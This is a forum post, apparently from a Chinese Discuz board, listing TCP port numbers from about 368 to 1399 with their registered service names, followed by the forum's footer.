368/tcp qbikgdp QbikGDP
371/tcp clearcase Clearcase
372/tcp ulistproc ListProcessor
373/tcp legent-1 Legent Corporation
374/tcp legent-2

374/tcp legent-2 Legent Corporation
375/tcp hassle Hassle
376/tcp nip Amiga Envoy Network Inquiry Proto
377/tcp tnETOS NEC Corporation
378/tcp dsETOS NEC Corporation
379/tcp is99c TIA/EIA/IS-99 modem client
380/tcp is99s TIA/EIA/IS-99 modem server
381/tcp hp-collector hp performance data collector
383/tcp hp-alarm-mgr hp performance data alarm manager
384/tcp arns A Remote Network Server System
385/tcp ibm-app IBM Application
386/tcp asa ASA Message Router Object Def.
387/tcp aurp Appletalk Update-Based Routing Pro.
388/tcp unidata-ldm Unidata LDM Version 4
389/tcp ldap Lightweight Directory Access Protocol
390/tcp uis UIS
391/tcp synotics-relay SynOptics SNMP Relay Port
393/tcp dis Data Interpretation System
394/tcp embl-ndt EMBL Nucleic Data Transfer
395/tcp netcp NETscout Control Protocol
396/tcp netware-ip Novell Netware over IP
397/tcp mptn Multi Protocol Trans. Net.
398/tcp kryptolan Kryptolan
399/tcp iso-tsap-c2 ISO Transport Class 2 Non-Control over TCP
400/tcp work-sol Workstation Solutions
401/tcp ups Uninterruptible Power Supply
402/tcp genie Genie Protocol
403/tcp decap decap
404/tcp nced nced
405/tcp ncld ncld
406/tcp imsp Interactive Mail Support Protocol
407/tcp timbuktu Timbuktu
408/tcp prm-sm Prospero Resource Manager Sys. Man.
409/tcp prm-nm Prospero Resource Manager Node Man.
410/tcp decladebug DECLadebug Remote Debug Protocol
411/tcp rmt Remote MT Protocol
412/tcp synoptics-trap Trap Convention Port
413/tcp smsp SMSP
414/tcp infoseek InfoSeek
415/tcp bnet BNet
416/tcp silverplatter Silverplatter
417/tcp onmux Onmux
418/tcp hyper-g Hyper-G
419/tcp ariel1 Ariel
420/tcp smpte SMPTE
421/tcp ariel2 Ariel
422/tcp ariel3 Ariel
423/tcp opc-job-start IBM Operations Planning and Control Start
424/tcp opc-job-track IBM Operations Planning and Control Track
425/tcp icad-el ICAD
426/tcp smartsdp smartsdp
427/tcp svrloc Server Location
428/tcp ocs_cmu OCS_CMU
429/tcp ocs_amu OCS_AMU
430/tcp utmpsd UTMPSD
431/tcp utmpcd UTMPCD
432/tcp iasd IASD
433/tcp nnsp NNSP
434/tcp mobileip-agent MobileIP-Agent
435/tcp mobilip-mn MobilIP-MN
436/tcp dna-cml DNA-CML
437/tcp comscm comscm
438/tcp dsfgw dsfgw
439/tcp dasp dasp Thomas Obermair
440/tcp sgcp sgcp
441/tcp decvms-sysmgt decvms-sysmgt
442/tcp cvc_hostd cvc_hostd
443/tcp https http protocol over TLS/SSL
444/tcp snpp Simple Network Paging Protocol
445/tcp microsoft-ds Microsoft-DS
446/tcp ddm-rdb DDM-RDB
447/tcp ddm-dfm DDM-RFM
448/tcp ddm-ssl DDM-SSL
449/tcp as-servermap AS Server Mapper
450/tcp tserver TServer
451/tcp sfs-smp-net Cray Network Semaphore server
453/tcp creativeserver CreativeServer
454/tcp contentserver ContentServer
455/tcp creativepartnr CreativePartnr
456/tcp macon-tcp macon-tcp
457/tcp scohelp scohelp
458/tcp appleqtc apple quick time
459/tcp ampr-rcmd ampr-rcmd
460/tcp skronk skronk
461/tcp datasurfsrv DataRampSrv
462/tcp datasurfsrvsec DataRampSrvSec
463/tcp alpes alpes
464/tcp kpasswd kpasswd
465/tcp smtps smtp protocol over TLS/SSL (was ssmtp)
466/tcp digital-vrc digital-vrc
467/tcp mylex-mapd mylex-mapd
468/tcp photuris proturis
469/tcp rcp Radio Control Protocol
470/tcp scx-proxy scx-proxy
471/tcp mondex Mondex
472/tcp ljk-login ljk-login
473/tcp hybrid-pop hybrid-pop
474/tcp tn-tl-w1 tn-tl-w1
475/tcp tcpnethaspsrv tcpnethaspsrv
476/tcp tn-tl-fd1 tn-tl-fd1
477/tcp ss7ns ss7ns
478/tcp spsc spsc
479/tcp iafserver iafserver
480/tcp iafdbase iafdbase
481/tcp ph Ph service
482/tcp bgs-nsi bgs-nsi
483/tcp ulpnet ulpnet
484/tcp integra-sme Integra Software Management Environment
485/tcp powerburst Air Soft Power Burst
486/tcp avian avian
487/tcp saft saft Simple Asynchronous File Transfer
488/tcp gss-http gss-http
489/tcp nest-protocol nest-protocol
490/tcp micom-pfs micom-pfs
491/tcp go-login go-login
492/tcp ticf-1 Transport Independent Convergence for FNA
493/tcp ticf-2 Transport Independent Convergence for FNA
494/tcp pov-ray POV-Ray
495/tcp intecourier intecourier
496/tcp pim-rp-disc PIM-RP-DISC
497/tcp dantz dantz
498/tcp siam siam
499/tcp iso-ill ISO ILL Protocol
500/tcp isakmp isakmp
501/tcp stmf STMF
502/tcp asa-appl-proto asa-appl-proto
503/tcp intrinsa Intrinsa
504/tcp citadel citadel
505/tcp mailbox-lm mailbox-lm
506/tcp ohimsrv ohimsrv
507/tcp crs crs
508/tcp xvttp xvttp
509/tcp snare snare
510/tcp fcp FirstClass Protocol
511/tcp passgo PassGo
512/tcp exec remote process execution;
513/tcp login remote login a la telnet;
514/tcp shell cmd
515/tcp printer spooler
516/tcp videotex videotex
517/tcp talk like tenex link, but across
518/tcp ntalk
519/tcp utime unixtime
520/tcp efs extended file name server
521/tcp ripng ripng
522/tcp ulp ULP
523/tcp ibm-db2 IBM-DB2
524/tcp ncp NCP
525/tcp timed timeserver
526/tcp tempo newdate
527/tcp stx Stock IXChange
528/tcp custix Customer IXChange
529/tcp irc-serv IRC-SERV
530/tcp courier rpc
531/tcp conference chat
532/tcp netnews readnews
533/tcp netwall for emergency broadcasts
534/tcp mm-admin MegaMedia Admin
535/tcp iiop iiop
536/tcp opalis-rdv opalis-rdv
537/tcp nmsp Networked Media Streaming Protocol
538/tcp gdomap gdomap
539/tcp apertus-ldp Apertus Technologies Load Determination
540/tcp uucp uucpd
541/tcp uucp-rlogin uucp-rlogin
542/tcp commerce commerce
543/tcp klogin
544/tcp kshell krcmd
545/tcp appleqtcsrvr appleqtcsrvr
546/tcp dhcpv6-client DHCPv6 Client
547/tcp dhcpv6-server DHCPv6 Server
548/tcp afpovertcp AFP over TCP
549/tcp idfp IDFP
550/tcp new-rwho new-who
551/tcp cybercash cybercash
552/tcp deviceshare deviceshare
553/tcp pirp pirp
554/tcp rtsp Real Time Stream Control Protocol
555/tcp dsf
556/tcp remotefs rfs server
557/tcp openvms-sysipc openvms-sysipc
558/tcp sdnskmp SDNSKMP
559/tcp teedtap TEEDTAP
560/tcp rmonitor rmonitord
561/tcp monitor
562/tcp chshell chcmd
563/tcp nntps nntp protocol over TLS/SSL (was snntp)
564/tcp 9pfs plan 9 file service
565/tcp whoami whoami
566/tcp streettalk streettalk
567/tcp banyan-rpc banyan-rpc
568/tcp ms-shuttle microsoft shuttle
569/tcp ms-rome microsoft rome
570/tcp meter demon
571/tcp meter udemon
572/tcp sonar sonar
573/tcp banyan-vip banyan-vip
574/tcp ftp-agent FTP Software Agent System
575/tcp vemmi VEMMI
576/tcp ipcd ipcd
577/tcp vnas vnas
578/tcp ipdd ipdd
579/tcp decbsrv decbsrv
581/tcp bdp Bundle Discovery Protocol
588/tcp cal CAL
589/tcp eyelink EyeLink
590/tcp tns-cml TNS CML
593/tcp http-rpc-epmap HTTP RPC Ep Map
594/tcp tpip TPIP
596/tcp smsd SMSD
599/tcp acp Aeolon Core Protocol
600/tcp ipcserver Sun IPC server
606/tcp urm Cray Unified Resource Manager
607/tcp nqs nqs
608/tcp sift-uft Sender-Initiated/Unsolicited File Transfer
609/tcp npmp-trap npmp-trap
610/tcp npmp-local npmp-local
611/tcp npmp-gui npmp-gui
613/tcp hmmp-op HMMP Operation
620/tcp sco-websrvrmgr SCO WebServer Manager
621/tcp escp-ip ESCP
625/tcp dec_dlm DEC DLM
626/tcp asia ASIA
628/tcp qmqp QMQP
630/tcp rda RDA
631/tcp ipp IPP (Internet Printing Protocol)
632/tcp bmpp bmpp
634/tcp ginad ginad
635/tcp rlzdbase RLZ DBase
636/tcp ldaps ldap protocol over TLS/SSL (was sldap)
637/tcp lanserver lanserver
639/tcp msdp MSDP
666/tcp doom doom Id Software
667/tcp disclose campaign contribution disclosures - SDR Technologies
668/tcp mecomm MeComm
669/tcp meregister MeRegister
670/tcp vacdsm-sws VACDSM-SWS
671/tcp vacdsm-app VACDSM-APP
672/tcp vpps-qua VPPS-QUA
673/tcp cimplex CIMPLEX
674/tcp acap ACAP
675/tcp dctp DCTP
704/tcp elcsd errlog copy/server daemon
705/tcp agentx AgentX
709/tcp entrust-kmsh Entrust Key Management Service Handler
710/tcp entrust-ash Entrust Administration Service Handler
729/tcp netviewdm1 IBM NetView DM/6000 Server/Client
730/tcp netviewdm2 IBM NetView DM/6000 send/tcp
731/tcp netviewdm3 IBM NetView DM/6000 receive/tcp
741/tcp netgw netGW
742/tcp netrcs Network based Rev. Cont. Sys.
744/tcp flexlm Flexible License Manager
747/tcp fujitsu-dev Fujitsu Device Control
748/tcp ris-cm Russell Info Sci Calendar Manager
749/tcp kerberos-adm kerberos administration
750/tcp rfile
751/tcp pump
752/tcp qrh
753/tcp rrh
754/tcp tell send
758/tcp nlogin
759/tcp con
760/tcp ns
761/tcp rxe
762/tcp quotad
763/tcp cycleserv
764/tcp omserv
765/tcp webster
769/tcp vid
770/tcp cadlock
771/tcp rtip
772/tcp cycleserv2
773/tcp submit
774/tcp rpasswd
776/tcp wpages
780/tcp wpgs
786/tcp concert Concert
787/tcp qsc QSC
801/tcp device
873/tcp rsync rsync
886/tcp iclcnet-locate ICL coNETion locate server
887/tcp iclcnet_svinfo ICL coNETion server info
888/tcp accessbuilder AccessBuilder
900/tcp omginitialrefs OMG Initial Refs
911/tcp xact-backup xact-backup
990/tcp ftps ftp protocol, control, over TLS/SSL
991/tcp nas Netnews Administration System
992/tcp telnets telnet protocol over TLS/SSL
993/tcp imaps imap4 protocol over TLS/SSL
994/tcp ircs irc protocol over TLS/SSL
995/tcp pop3s pop3 protocol over TLS/SSL (was spop3)
996/tcp vsinet vsinet
997/tcp maitrd
998/tcp busboy
999/tcp garcon 1000/tcp cadlock
1010/tcp surf surf
1023/tcp Reserved Reserved
1030/tcp iad1 BBN IAD
1031/tcp iad2 BBN IAD
1032/tcp iad3 BBN IAD
1047/tcp neod1 Sun‘s NEO Object Request Broker
1048/tcp neod2 Sun‘s NEO Object Request Broker
1058/tcp nim nim
1059/tcp nimreg nimreg
1067/tcp instl_boots Installation Bootstrap Proto. Serv.
1068/tcp instl_bootc Installation Bootstrap Proto. Cli.
1080/tcp socks Socks
1083/tcp ansoft-lm-1 Anasoft License Manager
1084/tcp ansoft-lm-2 Anasoft License Manager
1123/tcp murray Murray
1155/tcp nfa Network File Access
1212/tcp lupa lupa
1222/tcp nerv SNI R&D network
1239/tcp nmsd NMSD
1248/tcp hermes
1313/tcp bmc_patroldb BMC_PATROLDB
1314/tcp pdps Photoscript Distributed Printing System
1321/tcp pip PIP
1345/tcp vpjp VPJP
1346/tcp alta-ana-lm Alta Analytics License Manager
1347/tcp bbn-mmc multi media conferencing
1348/tcp bbn-mmx multi media conferencing
1349/tcp sbook Registration Network Protocol
1350/tcp editbench Registration Network Protocol
1352/tcp lotusnote Lotus Note
1353/tcp relief Relief Consulting
1354/tcp rightbrain RightBrain Software
1355/tcp intuitive-edge Intuitive Edge
1356/tcp cuillamartin CuillaMartin Company
1357/tcp pegboard Electronic PegBoard
1358/tcp connlcli CONNLCLI
1359/tcp ftsrv FTSRV
1360/tcp mimer MIMER
1361/tcp linx LinX
1362/tcp timeflies TimeFlies
1363/tcp ndm-requester Network DataMover Requester
1364/tcp ndm-server Network DataMover Server
1365/tcp adapt-sna Network Software Associates
1366/tcp netware-csp Novell NetWare Comm Service Platform
1367/tcp dcs DCS
1368/tcp screencast ScreenCast
1369/tcp gv-us GlobalView to Unix Shell
1370/tcp us-gv Unix Shell to GlobalView
1371/tcp fc-cli Fujitsu Config Protocol
1372/tcp fc-ser Fujitsu Config Protocol
1373/tcp chromagrafx Chromagrafx
1374/tcp molly EPI Software Systems
1375/tcp bytex Bytex
1376/tcp ibm-pps IBM Person to Person Software
1377/tcp cichlid Cichlid License Manager
1378/tcp elan Elan License Manager
1379/tcp dbreporter Integrity Solutions
1380/tcp telesis-licman Telesis Network License Manager
1381/tcp apple-licman Apple Network License Manager
1382/tcp udt_os
1383/tcp gwha GW Hannaway Network License Manager
1384/tcp os-licman Objective Solutions License Manager
1385/tcp atex_elmd Atex Publishing License Manager
1386/tcp checksum CheckSum License Manager
1387/tcp cadsi-lm Computer Aided Design Software Inc LM
1388/tcp objective-dbc Objective Solutions DataBase Cache
1389/tcp iclpv-dm document.nbspManager
1390/tcp iclpv-sc Storage Controller
1391/tcp iclpv-sas Storage Access Server
1392/tcp iclpv-pm Print Manager
1393/tcp iclpv-nls Network Log Server
1394/tcp iclpv-nlc Network Log Client
1395/tcp iclpv-wsm PC Workstation Manager software
1396/tcp dvl-activemail DVL Active Mail
1399/tcp cadkey-licman Cadkey License Manager
[glow=255,red,2][fly][/fly][/glow]
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|网上读书园地

GMT+8, 2024-11-20 23:38 , Processed in 0.294492 second(s), 18 queries .

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表